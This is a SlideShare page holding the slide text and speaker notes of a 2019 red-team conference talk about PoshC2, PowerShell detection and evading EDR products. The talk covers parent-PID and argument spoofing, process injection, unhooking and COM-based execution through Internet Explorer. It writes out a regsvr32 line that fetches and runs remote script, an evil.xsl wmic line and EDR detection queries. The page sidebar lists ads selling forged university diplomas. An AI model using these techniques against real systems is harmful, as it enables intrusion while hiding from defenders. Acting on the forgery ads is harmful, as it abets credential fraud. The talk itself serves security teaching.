DotNet IntroductionDotNet Introduction
DotNet Introduction
 
Runtime Environment Of .Net Divya Rathore
Runtime Environment Of .Net Divya RathoreRuntime Environment Of .Net Divya Rathore
Runtime Environment Of .Net Divya Rathore
 
Production Debugging at Code Camp Philly
Production Debugging at Code Camp PhillyProduction Debugging at Code Camp Philly
Production Debugging at Code Camp Philly
 
CSW2017 Amanda rousseau cansecwest2017_net_hijacking_powershell
CSW2017 Amanda rousseau cansecwest2017_net_hijacking_powershellCSW2017 Amanda rousseau cansecwest2017_net_hijacking_powershell
CSW2017 Amanda rousseau cansecwest2017_net_hijacking_powershell
 
Dotnetintroduce 100324201546-phpapp02
Dotnetintroduce 100324201546-phpapp02Dotnetintroduce 100324201546-phpapp02
Dotnetintroduce 100324201546-phpapp02
 
Codeigniter
CodeigniterCodeigniter
Codeigniter
 
Operator SDK for K8s using Go
Operator SDK for K8s using GoOperator SDK for K8s using Go
Operator SDK for K8s using Go
 
Overview Of Parallel Development - Ericnel
Overview Of Parallel Development - EricnelOverview Of Parallel Development - Ericnel
Overview Of Parallel Development - Ericnel
 
Beyond Breakpoints: A Tour of Dynamic Analysis
Beyond Breakpoints: A Tour of Dynamic AnalysisBeyond Breakpoints: A Tour of Dynamic Analysis
Beyond Breakpoints: A Tour of Dynamic Analysis
 
How to write clean & testable code without losing your mind
How to write clean & testable code without losing your mindHow to write clean & testable code without losing your mind
How to write clean & testable code without losing your mind
 
Activity 5
Activity 5Activity 5
Activity 5
 
.Net Hijacking to Defend PowerShell BSidesSF2017
.Net Hijacking to Defend PowerShell BSidesSF2017 .Net Hijacking to Defend PowerShell BSidesSF2017
.Net Hijacking to Defend PowerShell BSidesSF2017
 
LogChaos: Challenges and Opportunities of Security Log Standardization
LogChaos: Challenges and Opportunities of Security Log StandardizationLogChaos: Challenges and Opportunities of Security Log Standardization
LogChaos: Challenges and Opportunities of Security Log Standardization
 
.Net Debugging Techniques
.Net Debugging Techniques.Net Debugging Techniques
.Net Debugging Techniques
 
.NET Debugging Tips and Techniques
.NET Debugging Tips and Techniques.NET Debugging Tips and Techniques
.NET Debugging Tips and Techniques
 
MS Day EPITA 2010: Visual Studio 2010 et Framework .NET 4.0
MS Day EPITA 2010: Visual Studio 2010 et Framework .NET 4.0MS Day EPITA 2010: Visual Studio 2010 et Framework .NET 4.0
MS Day EPITA 2010: Visual Studio 2010 et Framework .NET 4.0
 
Visual Studio .NET2010
Visual Studio .NET2010Visual Studio .NET2010
Visual Studio .NET2010
 
The Hacking Games - Operation System Vulnerabilities Meetup 29112022
The Hacking Games - Operation System Vulnerabilities Meetup 29112022The Hacking Games - Operation System Vulnerabilities Meetup 29112022
The Hacking Games - Operation System Vulnerabilities Meetup 29112022
 
Thug: a new low-interaction honeyclient
Thug: a new low-interaction honeyclientThug: a new low-interaction honeyclient
Thug: a new low-interaction honeyclient
 
SAP strikes back Your SAP server now counter attacks.
SAP strikes back Your SAP server now counter attacks.SAP strikes back Your SAP server now counter attacks.
SAP strikes back Your SAP server now counter attacks.
 

Recently uploaded

办理毕业证(UPenn毕业证)宾夕法尼亚大学毕业证成绩单快速办理
办理毕业证(UPenn毕业证)宾夕法尼亚大学毕业证成绩单快速办理办理毕业证(UPenn毕业证)宾夕法尼亚大学毕业证成绩单快速办理
办理毕业证(UPenn毕业证)宾夕法尼亚大学毕业证成绩单快速办理
uehowe
 
重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理
重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理
重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理
vmemo1
 
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptxBridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
Brad Spiegel Macon GA
 
留学学历(UoA毕业证)奥克兰大学毕业证成绩单官方原版办理
留学学历(UoA毕业证)奥克兰大学毕业证成绩单官方原版办理留学学历(UoA毕业证)奥克兰大学毕业证成绩单官方原版办理
留学学历(UoA毕业证)奥克兰大学毕业证成绩单官方原版办理
bseovas
 
留学挂科(UofM毕业证)明尼苏达大学毕业证成绩单复刻办理
留学挂科(UofM毕业证)明尼苏达大学毕业证成绩单复刻办理留学挂科(UofM毕业证)明尼苏达大学毕业证成绩单复刻办理
留学挂科(UofM毕业证)明尼苏达大学毕业证成绩单复刻办理
uehowe
 
Understanding User Behavior with Google Analytics.pdf
Understanding User Behavior with Google Analytics.pdfUnderstanding User Behavior with Google Analytics.pdf
Understanding User Behavior with Google Analytics.pdf
SEO Article Boost
 
学位认证网(DU毕业证)迪肯大学毕业证成绩单一比一原版制作
学位认证网(DU毕业证)迪肯大学毕业证成绩单一比一原版制作学位认证网(DU毕业证)迪肯大学毕业证成绩单一比一原版制作
学位认证网(DU毕业证)迪肯大学毕业证成绩单一比一原版制作
zyfovom
 
制作原版1:1(Monash毕业证)莫纳什大学毕业证成绩单办理假
制作原版1:1(Monash毕业证)莫纳什大学毕业证成绩单办理假制作原版1:1(Monash毕业证)莫纳什大学毕业证成绩单办理假
制作原版1:1(Monash毕业证)莫纳什大学毕业证成绩单办理假
ukwwuq
 
办理新西兰奥克兰大学毕业证学位证书范本原版一模一样
办理新西兰奥克兰大学毕业证学位证书范本原版一模一样办理新西兰奥克兰大学毕业证学位证书范本原版一模一样
办理新西兰奥克兰大学毕业证学位证书范本原版一模一样
xjq03c34
 
Gen Z and the marketplaces - let's translate their needs
Gen Z and the marketplaces - let's translate their needsGen Z and the marketplaces - let's translate their needs
Gen Z and the marketplaces - let's translate their needs
Laura Szabó
 
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdf
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdfMeet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdf
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdf
Florence Consulting
 
7 Best Cloud Hosting Services to Try Out in 2024
7 Best Cloud Hosting Services to Try Out in 20247 Best Cloud Hosting Services to Try Out in 2024
7 Best Cloud Hosting Services to Try Out in 2024
Danica Gill
 
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
cuobya
 
存档可查的(USC毕业证)南加利福尼亚大学毕业证成绩单制做办理
存档可查的(USC毕业证)南加利福尼亚大学毕业证成绩单制做办理存档可查的(USC毕业证)南加利福尼亚大学毕业证成绩单制做办理
存档可查的(USC毕业证)南加利福尼亚大学毕业证成绩单制做办理
fovkoyb
 
制作毕业证书(ANU毕业证)莫纳什大学毕业证成绩单官方原版办理
制作毕业证书(ANU毕业证)莫纳什大学毕业证成绩单官方原版办理制作毕业证书(ANU毕业证)莫纳什大学毕业证成绩单官方原版办理
制作毕业证书(ANU毕业证)莫纳什大学毕业证成绩单官方原版办理
cuobya
 
[HUN][hackersuli] Red Teaming alapok 2024
[HUN][hackersuli] Red Teaming alapok 2024[HUN][hackersuli] Red Teaming alapok 2024
[HUN][hackersuli] Red Teaming alapok 2024
hackersuli
 
假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理
假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理
假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理
cuobya
 
Discover the benefits of outsourcing SEO to India
Discover the benefits of outsourcing SEO to IndiaDiscover the benefits of outsourcing SEO to India
Discover the benefits of outsourcing SEO to India
davidjhones387
 
manuaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaal
manuaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaalmanuaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaal
manuaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaal
wolfsoftcompanyco
 
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
eutxy
 

Recently uploaded (20)

办理毕业证(UPenn毕业证)宾夕法尼亚大学毕业证成绩单快速办理
办理毕业证(UPenn毕业证)宾夕法尼亚大学毕业证成绩单快速办理办理毕业证(UPenn毕业证)宾夕法尼亚大学毕业证成绩单快速办理
办理毕业证(UPenn毕业证)宾夕法尼亚大学毕业证成绩单快速办理
 
重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理
重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理
重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理
 
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptxBridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
 
留学学历(UoA毕业证)奥克兰大学毕业证成绩单官方原版办理
留学学历(UoA毕业证)奥克兰大学毕业证成绩单官方原版办理留学学历(UoA毕业证)奥克兰大学毕业证成绩单官方原版办理
留学学历(UoA毕业证)奥克兰大学毕业证成绩单官方原版办理
 
留学挂科(UofM毕业证)明尼苏达大学毕业证成绩单复刻办理
留学挂科(UofM毕业证)明尼苏达大学毕业证成绩单复刻办理留学挂科(UofM毕业证)明尼苏达大学毕业证成绩单复刻办理
留学挂科(UofM毕业证)明尼苏达大学毕业证成绩单复刻办理
 
Understanding User Behavior with Google Analytics.pdf
Understanding User Behavior with Google Analytics.pdfUnderstanding User Behavior with Google Analytics.pdf
Understanding User Behavior with Google Analytics.pdf
 
学位认证网(DU毕业证)迪肯大学毕业证成绩单一比一原版制作
学位认证网(DU毕业证)迪肯大学毕业证成绩单一比一原版制作学位认证网(DU毕业证)迪肯大学毕业证成绩单一比一原版制作
学位认证网(DU毕业证)迪肯大学毕业证成绩单一比一原版制作
 
制作原版1:1(Monash毕业证)莫纳什大学毕业证成绩单办理假
制作原版1:1(Monash毕业证)莫纳什大学毕业证成绩单办理假制作原版1:1(Monash毕业证)莫纳什大学毕业证成绩单办理假
制作原版1:1(Monash毕业证)莫纳什大学毕业证成绩单办理假
 
办理新西兰奥克兰大学毕业证学位证书范本原版一模一样
办理新西兰奥克兰大学毕业证学位证书范本原版一模一样办理新西兰奥克兰大学毕业证学位证书范本原版一模一样
办理新西兰奥克兰大学毕业证学位证书范本原版一模一样
 
Gen Z and the marketplaces - let's translate their needs
Gen Z and the marketplaces - let's translate their needsGen Z and the marketplaces - let's translate their needs
Gen Z and the marketplaces - let's translate their needs
 
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdf
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdfMeet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdf
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdf
 
7 Best Cloud Hosting Services to Try Out in 2024
7 Best Cloud Hosting Services to Try Out in 20247 Best Cloud Hosting Services to Try Out in 2024
7 Best Cloud Hosting Services to Try Out in 2024
 
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
 
存档可查的(USC毕业证)南加利福尼亚大学毕业证成绩单制做办理
存档可查的(USC毕业证)南加利福尼亚大学毕业证成绩单制做办理存档可查的(USC毕业证)南加利福尼亚大学毕业证成绩单制做办理
存档可查的(USC毕业证)南加利福尼亚大学毕业证成绩单制做办理
 
制作毕业证书(ANU毕业证)莫纳什大学毕业证成绩单官方原版办理
制作毕业证书(ANU毕业证)莫纳什大学毕业证成绩单官方原版办理制作毕业证书(ANU毕业证)莫纳什大学毕业证成绩单官方原版办理
制作毕业证书(ANU毕业证)莫纳什大学毕业证成绩单官方原版办理
 
[HUN][hackersuli] Red Teaming alapok 2024
[HUN][hackersuli] Red Teaming alapok 2024[HUN][hackersuli] Red Teaming alapok 2024
[HUN][hackersuli] Red Teaming alapok 2024
 
假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理
假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理
假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理
 
Discover the benefits of outsourcing SEO to India
Discover the benefits of outsourcing SEO to IndiaDiscover the benefits of outsourcing SEO to India
Discover the benefits of outsourcing SEO to India
 
manuaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaal
manuaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaalmanuaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaal
manuaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaal
 
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
 

powershell-is-dead-epic-learnings-london

  • 1. PowerShell is DEAD Epic Learnings June 2019
  • 2. Contents Introductions + Whoami / Whoarewe What is PowerShell + Understand what PowerShell is / key components + Is it DEAD? Evolution of PoshC2 + Release timeline & changes EDR + History & challenges (offensive) + Future predictions June 2019
  • 3. @benpturner + Managing Principal Security Consultant @ Nettitude + Lead the Global Red Team Operation @ Nettitude + 8 years as a Crest Team Leader (CHECK Team Leader - Infrastructure) + 4 years as a Crest Simulated Attack Specialist (CCSAS - STAR/CBEST) Training / Talks + Advanced Threat Actor Simulation - Red Team Training Course (Steelcon 2017/2018) + Workshops - Red Teaming with PoshC2 (BSides London/Manchester 2017) + Trusted Third Parties are NOT Trust Worthy (GiSEC Dubai 2019) - https://bit.ly/2I9ehIg + 21st Century War Stories (Steelcon/BSides 2016) - https://www.youtube.com/watch?v=O8Ul6QSPuo4 + PowerShell Fu with Metasploit (Steelcon/BSides 2015) - https://www.youtube.com/watch?v=ottfZFRSsj4 Development Projects + Lead developer of PoshC2 - Nettitude’s Open Source Command & Control (C2) Framework + General day to day PowerShell / C# projects & security research
  • 4. @b4ggio_su + Principal Security Consultant @ Nettitude + A Red Team Lead in the Global Red Team Operation @ Nettitude + 16 years in IT: • 4 years as a sysadmin • 4 years in a defensive role • 8 years in an offensive role Training / Talks + Advanced Threat Actor Simulation - Red Team Training Course + Red Team & Stuff (Bsides Mcr 2018 / OWASP Warwick 2019)
  • 5. @rbmaslen + Principal Security Consultant @ Nettitude + Red Teamer/Tools developer + 20 years in IT: • 14 years as a developer (mainly C++, C#, HTML/JS) • 6 years in an offensive role + CCT / CCSAM / OSCP / OSCE Training / Talks + Thick Client Destruction (Steelcon 2017) + COM and the PowerThIEf (Steelcon 2018) Development Projects + Contributor to PoshC2 - Nettitude’s Open Source Command & Control (C2) Framework + PowerThIEf, SharpSocks, C# portscanner & ArpScan
  • 6. Team Spicy Weasel 1st Place - 2018 + labs.nettitude.com/blog/derbycon-2018-ctf-write-up 1st Place - 2017 + labs.nettitude.com/blog/derbycon-2017-ctf-write-up 3rd Place - 2016 + labs.nettitude.com/blog/derbycon-2016-ctf-write-up
  • 7. What is PowerShell & is it DEAD? 1. The Microsoft binary - ”PowerShell.exe” 2. The DLL behind the binary ”System.Management.Automation.Dll” 3. The folder - C:WindowsSystem32WindowsPowerShellv1 .0 4. The version? Is PSv2 dead or only versions after 4 because of Transcript Logging, ScriptBlock Logging, Module Logging & AMSI Integration https://www.youtube.com/watch?v=IYD_aiQtVaE
  • 9. Evolution of PoshC2 2016 -> 2019  2016  June - v1.0 First Release of PoshC2 (Server/Implant in PowerShell)  Dec - v2.0 Released - C# GUI, Daisy Chaining & Portability  2017  Mar - v2.1 Removed C# GUI  May - PoshC2 Slack channel announced  July - PoshC2_Python Release  Oct – Reflective DLL / Shellcode Released  Nov - v3.0 Released with SharpSocks  2018  Feb - Readthedocs Documentation Released  July - v4.0 Released with Python Implant  2019  Jan - v4.8 Sharp Implant  Feb - Support for 2003/XP  June - SharpSocks Integration
  • 11. Process Listing – Initial Execution
  • 13. Carbon Black / Tanium / EDR 1. This is probably the best query in carbon black to detect malicious activity: “process_name:powershell.exe” 2. Do a search across your estate and see how much this shows up…….
  • 14. Carbon Black / Tanium / EDR 1. This is probably the best query in carbon black to detect malicious activity: “modload:system.management.automation.dll” “modload:system.management.automation.ni.dll” 2. Filter out “powershell.exe”, and others…… 3. Do a search across your estate and see how much this shows up…….
  • 15. Defensive / Legacy Approach (Reactive)  Block powershell.exe on all endpoints  Only allow signed powershell scripts to be executed  Upgrade “powershell.exe” to v5.0 for greater visibility  Enable constrained mode to restrict language elements  Monitor for “System.Management.Automation.Dll” in processes  Integrate AMSI with AV vendor for early signature detection  Enable & Monitor ScriptBlock Logging for suspicious cmdlets  Enable & Monitor Transcript Logging for suspicious signatures  Enable & Monitor Module Logging for signatured modules Modern Approach (Proactive)
  • 19. Supposedly Used by APT 33  Suspected attribution: Iran  Target sectors: Aerospace, energy  Overview: APT33 has targeted organizations, spanning multiple industries, headquartered in the U.S., Saudi Arabia and South Korea. APT33 has shown particular interest in organizations in the aviation sector involved in both military and commercial capacities, as well as organizations in the energy sector with ties to petrochemical production • https://www.fireeye.com/blog/threat- research/2018/12/overruled-containing-a-potentially- destructive-adversary.html • https://www.fireeye.com/blog/threat- research/2017/09/apt33-insights-into-iranian-cyber- espionage.html • https://www.fireeye.com/current-threats/apt- groups.html#apt33
  • 24. C# Implant / Reflection
  • 25. C# Implant / Reflection  loadmodule Seatbelt.exe  run-exe Seatbelt.Program Seatbelt all  run-exe Seatbelt.Program Seatbelt PowerShellSettings  run-dll Seatbelt.Program Seatbelt UserChecks
  • 26. C# Reflection  foreach (var Ass in AppDomain.CurrentDomain.GetAssemblies())  run-exe loadedType.Assembly.EntryPoint.Invoke(null, new object[] { splitnewargs }).ToString();  run-dll loadedType.Assembly.GetType(qualifiedname).InvokeMember(s Method, BindingFlags.Public | BindingFlags.InvokeMethod | BindingFlags.Static, null, null, new object[] { splitnewargs }).ToString();
  • 27. C# Reflection / OpSec Considerations
  • 31. Attacker Thoughts  Avoidance  Trickery  Partying with EDR
  • 33. Avoidance - Carbon Black Detected – But why: RTFM!
  • 34. Avoidance – Tanium Signal Definition image.path contains ‘system.management.automation’ AND process.path contains NOT ‘mscorsvw.exe’ AND process.path contains NOT ‘monitoringhost.exe’ AND process.path contains NOT ‘powershell.exe’ AND process.path contains NOT ‘powershell_ise.exe’ AND process.path contains NOT ‘sdiagnhost.exe’ AND process.path contains NOT ‘servermanager.exe’ AND process.path contains NOT ‘sqlps.exe’ AND process.path contains NOT ‘wsmprovhost.exe’ AND process.path contains NOT ‘Microsoft Azure AD SyncBinmiiserver.exe’ (Does require process tracing to be enabled in Tanium - quite heavy) Warning - Not doing a hash checksum on the processes or their location
  • 37. Parent PID Spoofing / Carbon Black
  • 40. Process Argument Spoofing 1. Create a process suspended – Fake Arguments 2. Identify the PEB using NTQueryProcessInformation 3. Parse PEB and Commandline structure 4. Overwrite the Commandline arguments using WriteProcessMemory – Real Arguments 5. Resume the process
  • 41. Process Argument Spoofing  https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing  https://blog.xpnsec.com/how-to-argue-like-cobalt-strike/  https://blog.cobaltstrike.com/2019/01/02/cobalt-strike-3-13-why-do-we-argue/
  • 42. Process Argument Spoofing – WHY? Execution  Powershell One Liner  regsvr32.exe /s /i:http://URL/file.sct scrobj.dll  wmic os get /FORMAT:”evil.xsl” Lateral Movement  SC COMPUTERNAME stop "SERVICENAME“  wmic.exe /node:<target> /user:<user> /password:"<password>" process call create "%Systemroot%Tempbatchfile.bat“
  • 44. Partying With EDR Migration Basics - Win API Calls:  VirtualAllocEX  WriteProcessMemory  CreateRemoteThread http://deniable.org/misc/inject-all-the-things However there are many ways to do the same thing, quick examples: RtlCreateUserThread SetWindowsHookEx NtCreateThreadEx QueueUserAPC
  • 45.
  • 46. “In computer programming, the term hooking covers a range of techniques used to alter or augment the behaviour of an operating system, of applications, or of other software components by intercepting function calls or messages or events passed between software components. Code that handles such intercepted function calls, events or messages is called a hook.” - Wikipedia What is Hooking?
  • 53.  Re-Patch Memory to remove JMP to original code  Update the IAT table to point to the correct function  Create a stub – to carry out the same system calls  Free a number of API calls and use FreeLibrary to remove interfering DLL’s https://medium.com/@fsx30/bypass-edrs-memory-protection- introduction-to-hooking-2efb21acffd6 Bringing Back The Good Times
  • 54. Demo
  • 55. Demo
  • 57. COM Intro – just watch this https://vimeo.com/214856542
  • 58.  Spoke about this at Steelcon last year, has proved really handy  Has been used to get past some EDRs  Breaks the attribution between process Migrating with COM into IE
  • 59. The key to this? Junction folders  Junction folders, a technique leaked in the Vault 7 dumps  Forms the basis of Sandbox escapers recent IE 11 sandbox escape  After adding some registry keys allows code to be executed when you navigate to a folder
  • 61. Loading the DLL in IE – first setup the registry
  • 62.  If we can get a reference to an IE Windows we can call  URL needs to be in the format shell:::{<GUID>}  https://docs.microsoft.com/en-us/previous- versions/windows/internet-explorer/ie-developer/platform- apis/aa752094(v%3Dvs.85) How can we use that
  • 63.  Great COM class allows you to enumerate all the current open IE & Explorer windows and automate them  Guess what you can then get them to navigate to a new location  https://msdn.microsoft.com/en- us/library/windows/desktop/bb773974(v=vs.85).aspx ShellWindows
  • 64. Loading the DLL in IE, PowerShell $shellWinGuid = [System.Guid]::Parse("{9BA05972-F6A8-11CF-A442- 00A0C90A8F39}") $typeShwin = [System.Type]::GetTypeFromCLSID($shellWinGuid) $shwin = [System.Activator]::CreateInstance($typeShwin) $shWin[0].Navigate2("shell:::{56B6E39E-AB81-4E34-BC8B-99D1D28FB7E4}", 2048) /*CLSID must be in the format "shell:::{CLSID}" Second param 2048 is BrowserNavConstants value for navOpenInNewTab https://msdn.microsoft.com/en-us/library/dd565688(v=vs.85).aspx Further ideas on what payloads you may be able to use */
  • 66. Can you do this in VBA, yes of course
  • 67. Can you do this in VBA, yes of course
  • 68.  Only use Native DLL’s? thankfully not  Using CCW’s Com Callable Wrappers we can write a .net dll and configure the registry keys so that when navigated to we can launch a .net dll. Use this as a COM Hijack if you want.  No time to go into CCW in depth but have a read of https://docs.microsoft.com/en- us/dotnet/framework/interop/com-callable-wrapper  .Net is started in IE and loads the dll  We need a .net assembly with class that implements an interface and some registry keys COM Callable Wrapper
  • 69. COM Callable Wrapper – Class Interface
  • 72. Setting up the .net registry keys
  • 73. Setting up the .net registry keys  Just make sure that you create or import the keys from a x64 application or use the explicit 64 bit key from the link below  https://docs.microsoft.com/en- us/windows/desktop/sysinfo/32-bit-and-64-bit-application- data-in-the-registry
  • 74. Also guess what the IE shortcut now does?
  • 75. One last thing – remember this script $shellWinGuid = [System.Guid]::Parse("{9BA05972-F6A8-11CF-A442- 00A0C90A8F39}") $typeShwin = [System.Type]::GetTypeFromCLSID($shellWinGuid) $shwin = [System.Activator]::CreateInstance($typeShwin) $shWin[0].Navigate2("shell:::{56B6E39E-AB81-4E34-BC8B-99D1D28FB7E4}", 2048) /*CLSID must be in the format "shell:::{CLSID}" Second param 2048 is BrowserNavConstants value for navOpenInNewTab https://msdn.microsoft.com/en-us/library/dd565688(v=vs.85).aspx Further ideas on what payloads you may be able to use */
  • 76. Lets tweak it $shellWinGuid = [System.Guid]::Parse("{9BA05972-F6A8-11CF-A442- 00A0C90A8F39}") $typeShwin = [System.Type]::GetTypeFromCLSID($shellWinGuid) $shwin = [System.Activator]::CreateInstance($typeShwin) $shWin[0].Navigate("c:windowssystem32WindowsPowerShellv1.0powers hell.exe")
  • 77. Running it (must have at least 1 explorer window open)
  • 78. Look who the parent is?
  • 79. EDR Summary  EDR is not a silver bullet  Does give incredible visibility to the Blue Team  Highly recommended as a complimentary piece to the defensive strategy but should not be solely relied on  Does not replace good people with experience  Constant Cat and Mouse game
  • 80. Future Predictions 1. Over reliance on EDR, especially on user endpoints and not server land or non Windows Systems 2. Customers focussing all attention on tertiary endpoints and not on critical functions or sensitive customer data 3. Move to Zerotrust networks and MFA everywhere 4. Machine Learning – Investment into Process & Procedures 5. C2 frameworks moving to C++ base code – Could see MSF be revived for red teaming 6. All standard AV/EDR vendors adopting in memory scanning / AMSI 7. Windows 7 is EOL January 2020 – not a prediction but a reality 8. Windows 10 removal of .NET v2 – not a prediction but a reality 9. People going back to single executables running either C++ or C# code to evade LOLBAS signatures (LOLBAS vs arbitrary exe)
  • 81. Future Predictions 1. Over reliance on EDR, especially on endpoints and not server land (or unix really) 2. C2 frameworks moving to C++ base code – Could see MSF be revived for RT 3. We already have this level of capability and its interesting what gets detected and what does not 4. All standard AV/EDR vendors adopting in memory scanning 5. Windows 7 is EOL January 2020 – not a prediction but a massive jump 6. Windows 10 removal of .NET v2 7. People going back to single executables running either c++ or c# code to evade lolbins signatures and
  • 82. THANK YOU Ben Turner @benpturner Doug McLeod @b4ggio_su Rob Maslen @rbmaslen https://www.steelcon.info/training/ https://www.slideshare.net/nettitude_labs/powershell-is-dead-epic-learning

Editor's Notes

  1. So whoami! My name is Ben Turner, I head up the Global Red Team @ Nettitude. As evident from the geeky title I’m a PowerShell & .NET enthusiast! One of the main reasons i’m standing here (ontop of being accepted to talk) is because over the last two years I’ve seen and met 3 or 4 people who have explicitly said to me they are in the industry and want to do red teaming because they saw my talks and were inspired! This really resonated with me and I thought and I want to encourage anyone to get up and talk. The industry as a whole has some people who try to crush people but
  2. Some other places you may have seen us is at Derbycon, we’re quite a keen attender of this conference. If you like CTF’s check out some of the blogs we wrote off the back of the cons. It will be sad this year its coming to an end – hopefully we can go out with a bang and maintain that 1st place position!
  3. .NET reflection can unhook
  4. So there has been a lot of talk about Powershell is dead and I wanted to share my small view of the world, with a slight focus on the evolution or PoshC2. For those not aware, PoshC2 Is a command and control framework that was created in purely powershell, designed to run on any windows endpoint. RAT – NOT Malware…… First of all created for learning purposes and evolved into much more, it really started out as 60 lines of code – this was including the logo! And now is in the 10s of thousands of lines of code. Lets think from an OPSEC perspective and show the start of PoshC2
  5. Started out as a windows only c2 server and c2 implant written for only powershell….
  6. Can anyone tell me what's wrong with this picture! PAUSE……………………….. Probably more obvious, a malicious PowerShell process has started as the user Jason…
  7. Lets dig a bit deeper and look at what the PowerShell command line arguments looks like to start with…. This is the default PoshC2 PowerShell implant Simple detections, anything running “powershell.exe” especially spawned from office, mshta, vbscript, jscript etc
  8. How easy is it to spot this
  9. Presence of the normal, abnormal presence of the???? Can you threat hunt across your estate?
  10. NO! Its just getting more difficult to deploy, and is only as good as the monitoring in place. There is lots of obfuscation that is still possible to evade static analysis and even dynamic analysis toolkits
  11. NO! Its just getting more difficult to deploy, and is only as good as the monitoring in place. There is lots of obfuscation that is still possible to evade static analysis and even dynamic analysis toolkits
  12. All throughout of 2018 APT 33 were being tracked by FireEye Amongst many other known threat actor groups, but the reason I pick on these guys is that they have been known to use PoshC2. People have been calling PoshC2 malware, but I would call this a remote access toolkit (RAT) that can be used for multi purposes
  13. Attribution is most likely IRAN And typically used across the aerospace and energy sectors… What’s really interesting here is that the IOCs (indicators of compromise) are that the threat actor is using the defaults, e.g. powershell one liners and are still having a huge amount of success Explicitly a guy called Andrew from FireEye – @QW5kcmV3
  14. The next big thing is the C# implant This is where it gets tough to find an implant as the clr.dll or mscoree.dll is loaded into more things than you realise
  15. Started out as a windows only c2 server and c2 implant written for only powershell….
  16. Started out as a windows only c2 server and c2 implant written for only powershell….
  17. DEMO!!!!! IF WE HAVE TIME
  18. Endpoint Detection and response is software that sends behavioural data to a central database for analysis
  19. This is us when we run a process list and see an EDR system!! But all is not lost and we have some example stories about challenges faced with different EDR solution Behaviour based not just signature
  20. We thought the blue team were watching an account which we needed to use. So we distracted them We know carbon black will flag on unsigned binaries connecting to the internet, so we pushed out unsigned binaries to a handful of machines and ran them Enough to keep them busy
  21. If the blue team have so much visibility, how can we through them of the sense. This is trickery and there are many things that can be done, but two that im going to lightly cover are Parent Pid spoofing and Argument spoofing….deliberately to mess with process chaining.
  22. STARTUPINFOEX This structure contains an lpAttributeList Update pid using UpdateProcThreadAttribute
  23. Event Tracing for Windows – ETW First screenshot shows the parent section process the same as the one below. Second example shows that the parent process and the Process ID in the parent are different.
  24. Process Argument Spoofing First of got to give credit to some of the initial people discussing this. Casey smith AND Will Burgess’s If you haven’t seen will’s talk - RedTeaming in the EDR Age then you should definitely go give it a watch. Also covers a tool they created Gargoyle to hide malware in memory.
  25. And, finally, programs that determine process arguments by reading the process PEB will see your real arguments and not our fake arguments.
  26. Migration basics – number of API calls – generally basic example will take a handle on another process and call virtualAllocEx, WriteProcessMemory and CreateRemoteThread These are not the only options available to us. Inject all the things – is a nice we project to assist in testing some of these calls – you should check it out Instead of using create remote threat we can use for example RTLCreateUserThreat – this bypassed the checks Symantec were looking for and we ended up with successful migration.
